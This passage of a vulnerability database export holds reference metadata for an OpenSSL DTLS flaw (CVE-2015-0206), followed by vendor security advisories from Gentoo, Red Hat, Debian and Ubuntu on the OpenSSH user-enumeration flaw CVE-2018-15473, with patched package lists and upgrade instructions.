"http://marc.info/?l=bugtraq\u0026m=144050254401665\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=143748090628601\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=144050155601375\u0026w=2" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2015-2370101.html" }, { "trust": 1.1, "url": "https://bto.bluecoat.com/security-advisory/sa88" }, { "trust": 1.1, "url": "http://www.securitytracker.com/id/1033378" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00037.html" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10108" }, { "trust": 1.1, "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10102" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/71940" }, { "trust": 1.1, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/99704" }, { "trust": 1.1, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3571" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3572" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0204" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0205" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3570" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8275" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0206" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2022.0696" }, { "trust": 0.6, "url": "https://www.auscert.org.au/bulletins/esb-2020.4252/" }, { "trust": 0.5, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.5, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3569" }, { "trust": 0.4, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765169" }, { "trust": 0.3, "url": "http://www.pexip.com/sites/pexip/files/pexip_security_bulletin_2015-01-30.pdf" }, { "trust": 0.3, "url": "http://openssl.org/" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanu5#affectedproductsandcomponents" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699883" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699667" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04746490" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04602055" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04765115" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774019" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04774021" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700275" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097503" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097811" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098358" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21694849" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698506" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0206" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.2, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/119.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5409" }, { "trust": 0.1, "url": "http://h20566.www2.hpe.com/hpsc/doc/public/display?calledby=search_result\u0026doc" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5412" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5413" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-20861d704bc04221a1518b7cb6" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5410" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5411" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2459-1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu9.1" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.23" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.21" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.8" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "http://www.hp.com/go/smh" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-8275" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0205" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3572" }, { "trust": 0.1, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3571" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "BID", "id": "71940" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "CNNVD", "id": "CNNVD-201501-173" }, { "db": "NVD", "id": "CVE-2015-0206" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2015-0206" }, { "db": "BID", "id": "71940" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133316" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "132763" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "CNNVD", "id": "CNNVD-201501-173" }, { "db": "NVD", "id": "CVE-2015-0206" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2015-0206" }, { "date": "2015-01-07T00:00:00", "db": "BID", "id": "71940" }, { "date": "2015-08-26T01:33:25", "db": "PACKETSTORM", "id": "133318" }, { "date": "2015-08-26T01:33:07", "db": "PACKETSTORM", "id": "133316" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-01-12T21:48:37", "db": "PACKETSTORM", "id": "129893" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-07-21T13:37:51", "db": "PACKETSTORM", "id": "132763" }, { "date": "2015-01-22T01:35:41", "db": "PACKETSTORM", "id": "130051" }, { "date": "2015-01-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-173" }, { "date": "2015-01-09T02:59:12.117000", "db": "NVD", "id": "CVE-2015-0206" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-10-20T00:00:00", "db": "VULMON", "id": "CVE-2015-0206" }, { "date": "2017-01-23T00:09:00", "db": "BID", "id": "71940" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-173" }, { "date": "2017-10-20T01:29:04.393000", "db": "NVD", "id": "CVE-2015-0206" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "129893" }, { "db": "PACKETSTORM", "id": "130051" }, { "db": "CNNVD", "id": "CNNVD-201501-173" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL \u2018 dtls1_buffer_record \u2018Function buffer error vulnerability", "sources": [ { "db": "CNNVD", "id": "CNNVD-201501-173" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201501-173" } ], "trust": 0.6 } }
var-201808-0455
Vulnerability from variot
OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. OpenSSH Contains an information disclosure vulnerability.Information may be obtained. OpenSSH is prone to a user-enumeration vulnerability. An attacker may leverage this issue to harvest valid user accounts, which may aid in brute-force attacks. OpenSSH through 7.7 are vulnerable; other versions may also be affected. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. This vulnerability stems from configuration errors in network systems or products during operation.
Impact
A remote attacker could conduct user enumeration.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-7.7_p1-r8"
References
[ 1 ] CVE-2018-15473 https://nvd.nist.gov/vuln/detail/CVE-2018-15473
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201810-03
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . 6) - i386, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Low: openssh security, bug fix, and enhancement update Advisory ID: RHSA-2019:2143-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2019:2143 Issue date: 2019-08-06 CVE Names: CVE-2018-15473 ==================================================================== 1. Summary:
An update for openssh is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.
Security Fix(es):
- openssh: User enumeration via malformed packets in authentication requests (CVE-2018-15473)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.7 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
1583735 - Permission denied reading authorized_keys when setting AuthorizedKeysCommand 1619063 - CVE-2018-15473 openssh: User enumeration via malformed packets in authentication requests 1712053 - tmux session not attached automatically during manual installation on s390x 1722446 - openssh FIPS cipher list has an extra comma in it
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-7.4p1-21.el7.src.rpm
x86_64: openssh-7.4p1-21.el7.x86_64.rpm openssh-askpass-7.4p1-21.el7.x86_64.rpm openssh-clients-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-keycat-7.4p1-21.el7.x86_64.rpm openssh-server-7.4p1-21.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-cavs-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.i686.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-ldap-7.4p1-21.el7.x86_64.rpm openssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-7.4p1-21.el7.src.rpm
x86_64: openssh-7.4p1-21.el7.x86_64.rpm openssh-clients-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-keycat-7.4p1-21.el7.x86_64.rpm openssh-server-7.4p1-21.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-7.4p1-21.el7.x86_64.rpm openssh-cavs-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.i686.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-ldap-7.4p1-21.el7.x86_64.rpm openssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-7.4p1-21.el7.src.rpm
ppc64: openssh-7.4p1-21.el7.ppc64.rpm openssh-askpass-7.4p1-21.el7.ppc64.rpm openssh-clients-7.4p1-21.el7.ppc64.rpm openssh-debuginfo-7.4p1-21.el7.ppc64.rpm openssh-keycat-7.4p1-21.el7.ppc64.rpm openssh-server-7.4p1-21.el7.ppc64.rpm
ppc64le: openssh-7.4p1-21.el7.ppc64le.rpm openssh-askpass-7.4p1-21.el7.ppc64le.rpm openssh-clients-7.4p1-21.el7.ppc64le.rpm openssh-debuginfo-7.4p1-21.el7.ppc64le.rpm openssh-keycat-7.4p1-21.el7.ppc64le.rpm openssh-server-7.4p1-21.el7.ppc64le.rpm
s390x: openssh-7.4p1-21.el7.s390x.rpm openssh-askpass-7.4p1-21.el7.s390x.rpm openssh-clients-7.4p1-21.el7.s390x.rpm openssh-debuginfo-7.4p1-21.el7.s390x.rpm openssh-keycat-7.4p1-21.el7.s390x.rpm openssh-server-7.4p1-21.el7.s390x.rpm
x86_64: openssh-7.4p1-21.el7.x86_64.rpm openssh-askpass-7.4p1-21.el7.x86_64.rpm openssh-clients-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-keycat-7.4p1-21.el7.x86_64.rpm openssh-server-7.4p1-21.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssh-cavs-7.4p1-21.el7.ppc64.rpm openssh-debuginfo-7.4p1-21.el7.ppc.rpm openssh-debuginfo-7.4p1-21.el7.ppc64.rpm openssh-ldap-7.4p1-21.el7.ppc64.rpm openssh-server-sysvinit-7.4p1-21.el7.ppc64.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.ppc.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.ppc64.rpm
ppc64le: openssh-cavs-7.4p1-21.el7.ppc64le.rpm openssh-debuginfo-7.4p1-21.el7.ppc64le.rpm openssh-ldap-7.4p1-21.el7.ppc64le.rpm openssh-server-sysvinit-7.4p1-21.el7.ppc64le.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.ppc64le.rpm
s390x: openssh-cavs-7.4p1-21.el7.s390x.rpm openssh-debuginfo-7.4p1-21.el7.s390.rpm openssh-debuginfo-7.4p1-21.el7.s390x.rpm openssh-ldap-7.4p1-21.el7.s390x.rpm openssh-server-sysvinit-7.4p1-21.el7.s390x.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.s390.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.s390x.rpm
x86_64: openssh-cavs-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.i686.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-ldap-7.4p1-21.el7.x86_64.rpm openssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-7.4p1-21.el7.src.rpm
x86_64: openssh-7.4p1-21.el7.x86_64.rpm openssh-askpass-7.4p1-21.el7.x86_64.rpm openssh-clients-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-keycat-7.4p1-21.el7.x86_64.rpm openssh-server-7.4p1-21.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-cavs-7.4p1-21.el7.x86_64.rpm openssh-debuginfo-7.4p1-21.el7.i686.rpm openssh-debuginfo-7.4p1-21.el7.x86_64.rpm openssh-ldap-7.4p1-21.el7.x86_64.rpm openssh-server-sysvinit-7.4p1-21.el7.x86_64.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.i686.rpm pam_ssh_agent_auth-0.10.3-2.21.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2018-15473 https://access.redhat.com/security/updates/classification/#low https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.7_release_notes/index
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXUl2+9zjgjWX9erEAQghMQ//ao8h2SV6O/qKXHnO+WB1PYTD3rzASW8f pE++fRS0YTGtkoCmwEsYDRqg7Xw+3LIX/j8gYztFtMDoU7alLTkywBvszsBvRSCF Xi2yutUkhcygCldcwrHwNgVGa2kMni6Fm/O2ZCLkHdOHZLwMOZjBe0T4Ompc2ok5 TshNRwUWjCfzY3pwG1c9lffrfq2/DgIzi+o9MCjNCaRgFKDo9Ufgw93CSmPm/61u WVr7pV/+yXRlswG0ZnK3gOK19lYQIQfS9sQJzFelcF1pOCseZUqiKOTVMcBP0XaB uIODY4Ra/BRX9pLXN9JkBTBE8iSPO+VGKoF/m9urqpg7Z+kaH2KwdyrJeHIzY/mA e1Cidd4RsK9HwwBoRdIlw6MjstoymmF2OaYcO0Yb36abUWEF0CFIZQeAZR89ZvGG zKnc+YybH/ELu1VEF7CfBQFyP6DFt8fgFvBI5yCCjzxy0XYVrave6zLO+6a7Hg94 5UDWDIIT7h55CYlfCiZ4pBClRJSO4/XKs3lcUsvirnyagyO5it1yZpkCiavFfcah PewUzfp6mz5BXUUhJHDdFe/LgAWE7DCiMy1A78iKy0kY4Yu/tgfgMJ/KXYnyIj62 mY7o0lHcjBNHqUVDscNOtbV3EG7jsgHI1XtTIOlBeijkmPaDZnnMbM5ZXhhDzGPV fl5KApr4ST8=wPC+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
For the stable distribution (stretch), this problem has been fixed in version 1:7.4p1-10+deb9u4.
We recommend that you upgrade your openssh packages.
For the detailed security status of openssh please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssh
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAlt9ATUACgkQEL6Jg/PV nWSHYggArjTv1/72Mxj8D8qXRiixHTY3QIRki03VOLQtk7tje8BmymeRerwmECGh fjBuF4sueVrBED7vWpf9+HU9Z8VYLDKQp56xMLlqnt1Ge5HaPVHLToY4gn/lOl+J pFGwn4BKYMlo+v/rnWg1Ay0n8DZnmg8GnBqgpeFI56AUy4rw9eaRAByI80Btd69u vInT9A/sOYmywD4fH6cl7JDDZHF1AxgkW9Jar/tTVQtR/PqT7Cb2RJmxOB75/BrG /8etuiWfh6sY4cBZco+AkXL2Yb97bJQdwDZQwqMLJtA2rdjSGA3zQdnzM8htrSYH p0SeM24q209KRsvXG9KM3vKWW4vohw== =qxOC -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-3809-2 August 12, 2021
openssh regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 18.04 LTS
Summary:
USN-3809-1 introduced a regression in OpenSSH.
Software Description: - openssh: secure shell (SSH) for secure access to remote machines
Details:
USN-3809-1 fixed vulnerabilities in OpenSSH. The update for CVE-2018-15473 was incomplete and could introduce a regression in certain environments. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Robert Swiecki discovered that OpenSSH incorrectly handled certain messages. An attacker could possibly use this issue to cause a denial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2016-10708) It was discovered that OpenSSH incorrectly handled certain requests. An attacker could possibly use this issue to access sensitive information. (CVE-2018-15473)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 18.04 LTS: openssh-server 1:7.6p1-4ubuntu0.5
In general, a standard system update will make all the necessary changes
